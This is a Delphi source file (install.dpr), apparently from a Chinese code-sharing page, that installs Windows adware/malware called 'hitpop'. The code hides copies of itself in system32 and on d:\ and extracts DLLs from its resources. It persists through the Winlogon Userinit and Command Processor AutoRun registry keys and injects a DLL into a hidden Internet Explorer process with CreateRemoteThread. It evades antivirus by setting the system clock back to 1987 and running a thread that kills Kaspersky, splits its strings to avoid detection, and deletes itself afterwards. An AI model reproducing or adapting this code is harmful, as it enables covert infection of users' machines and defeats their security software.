📄 install.dpr
字号:
try
SetFileAttributes(pchar(fn),0);
sleep(100);
p:=pchar(fn);
deletefile(p);
except
end;
end;
procedure mycopyfile(fn,fn_new:string);
begin
if fileexists(fn_new)=false then
try
copyfile(pchar(fn),pchar(fn_new),true);
sleep(1000);
SetFileAttributes(PChar(fn_new), FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY);
except
end;
end;
procedure copydll(fn,dllname,dlltype,dllflag,item,cfg:string);
begin
if fileexists(fn)=false then
try
FuckCode;
ExtractRes(dllname, dlltype, fn);
except
end;
IniFileWritedString(dllflag,item,fn,cfg);
end;
procedure SetTime(y,m,d,h,min,se,ms:word);
var rq:tdatetime;
SysTime: TSystemTime;
begin
rq:=EncodeDateTime(y,m,d,h,min,se,ms);
DateTimeToSystemTime(rq,SysTime);
//SetSystemTime(SysTime) ;
setlocaltime(SysTime);
end;
function GetIEPath: string;
var
Path: string;
begin
Path := GetSystemPath;
Delete(Path, Pos(':', Path) + 1, Length(Path));
Path := Copy(Path, 0, Pos(':', Path));
Path := Path + '\program files\internet explorer\iexplore.exe';
Result := Path;
end;
function StrPas(const Str: PChar): string;
begin
Result := Str;
end;
procedure GetWindowsHandle(ClassName:string;var st:string);
var h,wnd:integer;
ClassName1: array [0..50] of Char; { 当前窗体的类名 }
s:string;
begin
st:='';
h := GetActiveWindow(); //将IEFrame改成腾讯浏览器的类名
if h=0 then
h:=GetForegroundWindow();
wnd:=h;
while wnd<>0 do
begin
GetClassName(wnd, @ClassName1, 10);
if StrPas(@ClassName1) = ClassName then
begin
s:=inttostr(wnd);
st:=st+','+'['+s+']';
end;
wnd:=GetNextWindow(wnd,GW_HWNDNEXT);
end;
while wnd<>0 do
begin
GetClassName(wnd, @ClassName1, 10);
if StrPas(@ClassName1) = ClassName then
begin
s:=inttostr(wnd);
st:=st+',['+s+']';
end;
wnd:=GetNextWindow(wnd,GW_HWNDPREV);
end;
st:=copy(st,2,length(st))+',';
end;
//插入进程
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters:pointer;
thh,m1,p1,s1:cardinal;
Write_Process_Memory:function(hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL;
hdll:integer;
WriteProcessMemorys:string;
begin
Result := False;
//hDLL:=LoadLibrary(pchar(kernel32));
//if hdll>0 then
try
try
m1:=MEM_COMMIT;
p1:=PAGE_READWRITE;
s1:=4096;
FuckCode;
Parameters := xVirtual_AllocEx(Process, nil, s1, m1, p1);
FuckCode;
//showmessage('a');
if Parameters = nil then Exit;
sleep(1);
//WriteProcessMemory:='WriteProcess';
//WriteProcessMemory:=WriteProcessMemory+'Memory';
//hDLL:=
//Write_Process_Memory:=GetProcAddress(hDLL,pchar(WriteProcessMemory));
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), s1, BytesWritten);
FuckCode;
//showmessage('1');
//Create_Thread(nil, 0, @CloseKaoBa, nil, 0, thh);
Thread := xCreate_RemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
FuckCode;
//showmessage('2');
WaitForSingleObject(Thread, INFINITE);
FuckCode;
//showmessage('3');
xVirtual_FreeEx(Process, Parameters, 0, MEM_RELEASE);
//showmessage('b');
if Thread = 0 then Exit;
FuckCode;
CloseHandle(Thread);
Result := True;
except
end;
finally
//if hdll>0 then freelibrary(hdll);
end;
end;
procedure start_hitpop(fn_hit_dll:string);
var pid:integer;
Process: DWORD;
IEPath:string;
r:boolean;
StartInfo: TStartupInfo;
ProcInfo: TProcessInformation;
st1,st2,s,t{,kv}:string;
i:integer;
s_tmp:string;
begin
FuckCode;
//r:=false;
try
//复制插件dll
s:='i';
s:=s+'e';
IniFileWritedString(s,'run','no',cfg);
IniFileWritedString('ie','hwnd','',cfg);
//插入进程
try
EnabledDebugPrivilege(true);
except
end;
pid:=0;
//pid:=GetHanlde('qq.exe');
//if pid<=0 then pid:=GetHanlde('WangWang.exe');
//if pid<=0 then pid:=GetHanlde('popo.EXE');
//if pid<=0 then pid:=GetHanlde('KPFW32.EXE');
//if pid<=0 then pid:=GetHanlde('KAVStart.EXE');
//pid:=0;
if pid<=0 then
begin
IEPath:=GetIEPath;
try
//showmessage('a');
GetWindowsHandle('IEFrame',st1);
winexec(PChar(IEPath),sw_hide);
sleep(500);
GetWindowsHandle('IEFrame',st2);
//showmessage(st1+' '+st2);
t:=st2;
while true do
begin
if st2='' then break;
i:=pos(',',st2);
s:=copy(st2,1,i-1);
st2:=copy(st2,i+1,length(st2));
//showmessage(s+' --- '+t);
if s<>'' then
if pos(s,st1)<=0 then
begin
s:=copy(s,2,length(s));
s:=copy(s,1,length(s)-1);
//showmessage(s+' . '+t);
GetWindowThreadProcessId(strtoint(s), @Pid);
if pid>0 then
IniFileWritedString('ie','hwnd',s,cfg);
break;
end;
end;
except
end;
//showmessage('aa:'+inttostr(pid));
if pid<=0 then
begin
try
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
PID := ProcInfo.dwProcessId; //GetProcessID('IEXPLORE.EXE');
except
end;
//showmessage('bb:'+inttostr(pid));
end;
end;
//showmessage('3.'+inttostr(pid));
if pid<=0 then
try
GetWindowsHandle('IEFrame',st2);
if st2<>'' then
begin
i:=pos(',',st2);
s:=copy(st2,1,i-1);
s:=copy(s,2,length(s));
s:=copy(s,1,length(s)-1);
GetWindowThreadProcessId(strtoint(s), @Pid);
if pid>0 then
IniFileWritedString('ie','hwnd',s,cfg);
end;
except
end;
if pid>0 then
begin
FuckCode;
//PID:='';
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
//if Process=0 then showmessage('0')
//else showmessage('ok');
if Process>0 then
begin
try
EnabledDebugPrivilege(true);
haskv;
sleep(2000);
except
end;
try
r:=InjectLibrary(Process, Pchar(fn_hit_dll));
if r then
begin
s_tmp:='ie';
IniFileWritedString(s_tmp,'run','ok',cfg);
end;
except
end;
end;
end;
except
//on e:exception do
// showmessage(e.message);
end;
end;
var DllAllpath:string;
SystemPath,filename:string;
thh:cardinal;
oldcfg:string;
ver:string;
oldver,pif,autorun:string;
fn_exe,fn_dll16,fn_dll32,fn_bak_exe,fn_bak_dll16,s_hitpop:string;
y,m,d,h,min,se,ms,y_tmp:word;
sj,kb:boolean;
s1,tmp:string;
fn_dll_hit:string;
id:string;
begin
flag_end:=false;
try
try
sj:=false;
if paramcount>0 then
begin
//showmessage('a:'+paramstr(1));
if paramstr(1)='-sj' then
begin
sj:=true;
//showmessage('b:');
end;
end;
ver:=trim(flag_ver);
id:=trim(flag_id);
cfg:='myw';
cfg:=cfg+'in';
cfg:=cfg+'sy';
cfg:=cfg+'s.i';
cfg:=cfg+'ni';
SystemPath:=GetSystemPath;
filename:=lowercase(paramstr(0));
fn_exe:='Alx';
fn_exe:=fn_exe+'R';
fn_exe:=fn_exe+'es';
fn_dll16:='win';
fn_dll16:=fn_dll16+'sy';
fn_dll16:=fn_dll16+'s16_';
fn_dll32:='wins';
fn_dll32:=fn_dll32+'ys32_';
fn_bak_exe:='scrsys';
fn_bak_dll16:='scrs';
fn_bak_dll16:=fn_bak_dll16+'ys16_';
pif:=lowercase('d:\mplay.com');
s_hitpop:='hi';
s_hitpop:=s_hitpop+'tpop';
//autorun:='d:\autorun.inf';
//处理老版本
oldcfg:='winsy';
oldcfg:=oldcfg+'s.ini';
s1:=IniFileReadString(s_hitpop,'test','0',oldcfg);
if s1='1' then
begin
IniFileWritedString(s_hitpop,'test',s1,cfg);
end;
s1:=IniFileReadString('sys','usertype','',oldcfg);
if s1='main' then
begin
IniFileWritedString('sys','usertype',s1,cfg);
end;
if lowercase(pif)=filename then
begin
oldver:=IniFileReadString(s_hitpop,'ver','0',cfg);
if strtoint(ver)<strtoint(oldver) then
exit;
DllAllpath:=SystemPath+fn_exe+ver+'.exe';
if fileexists(DllAllpath) then
begin
DllAllpath:=SystemPath+fn_dll16+ver+'.dll';
if fileexists(DllAllpath) then
exit;
end
end;
EnabledDebugPrivilege(true);
kb:=HasKaba;
if kb then
try
DecodeDateTime(now,Y, M, d,h,min,se,ms);
y_tmp:=y;
y:=1987;
SetTime(y,m,d,h,min,se,ms);
sleep(14*1000);
except
end;
haskv;
CreateThread(nil, 0, @CloseKaoBa, nil, 0, thh);
//在d判建启动
{if lowercase(id)='test' then
try
SetFileAttributes(PChar(autorun), 0);
sleep(500);
IniFileWritedString('autorun','open',pif,autorun);
sleep(500);
SetFileAttributes(PChar(autorun), FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY);
except
end;}
//删除前1版本
oldver:=IniFileReadString(s_hitpop,'ver','0',cfg);
if strtoint(ver)>strtoint(oldver) then
if sj=false then
begin
FuckCode;
IniFileWritedString(s_hitpop,'ver',ver,cfg);
DllAllpath:=SystemPath+fn_exe+oldver+'.exe';
mydeletefile(DllAllpath);
DllAllpath:=SystemPath+fn_bak_exe+oldver+'.scr';
mydeletefile(DllAllpath);
DllAllpath:=SystemPath+fn_dll32+oldver+'.dll';
mydeletefile(DllAllpath);
DllAllpath:=SystemPath+fn_dll16+oldver+'.dll';
mydeletefile(DllAllpath);
DllAllpath:=SystemPath+fn_bak_dll16+oldver+'.scr';
mydeletefile(DllAllpath);
mydeletefile(pif);
end;
FuckCode;
//复制自身到d:\
mycopyfile(FileName,pif);
IniFileWritedString('exe','fn_pif',pif,cfg);
//复制自身到system32
DllAllpath:=SystemPath+fn_exe+ver+'.exe';
mycopyfile(FileName,DllAllpath);
IniFileWritedString('exe','fn',DllAllpath,cfg);
DllAllpath:=SystemPath+fn_bak_exe+ver+'.scr';
mycopyfile(FileName,DllAllpath);
IniFileWritedString('exe_bak','fn',DllAllpath,cfg);
//复制插件dll
DllAllpath:=SystemPath+fn_dll32+ver+'.dll';
tmp:='dll_';
tmp:=tmp+'hi';
tmp:=tmp+'t';
tmp:=tmp+'pop';
copydll(DllAllpath,'maindll', 'dll',tmp,'fn',cfg);
fn_dll_hit:=DllAllpath;
//复制启动dll到system32
DllAllpath:=SystemPath+fn_bak_dll16+ver+'.scr';
copydll(DllAllpath,'start', 'dll','dll_start_bak','fn',cfg);
DllAllpath:=SystemPath+fn_dll16+ver+'.dll';
copydll(DllAllpath,'start', 'dll','dll_start','fn',cfg);
//写自启动注册表
//HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
//sleep(100);
if FileExists(DllAllpath) then
begin
FuckCode;
CreateRegKeyValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit','rundll32.exe '+DllAllpath+' start');
IniFileWritedString(s_hitpop,'kv','0',cfg);
end;
//插入进程
if FileExists(fn_dll_hit) then
if lowercase(pif)<>FileName then
if sj=false then
start_hitpop(fn_dll_hit);
if fileexists(pif) then
CreateBakRegKeyValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Command Processor','AutoRun',pif);
except
end;
finally
sleep(1000*3);
flag_end:=true;
//sleep(1000*20);
//showmessage(SystemPath+#13+FileName);
//halt;
if kb then
try
DecodeDateTime(now,Y, M, d,h,min,se,ms);
y:=y_tmp;
if y<2007 then y:=2007;
SetTime(y,m,d,h,min,se,ms);
except
end;
//RunKv;
IniFileWritedString('sys','bat',BatchFileName,cfg);
if pos(lowercase(SystemPath),lowercase(FileName))<=0 then
if lowercase(pif)<>lowercase(FileName) then
if pos('system32',FileName)<=0 then
ExtDelMe(FileName);
end;
FuckCode;
exit;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -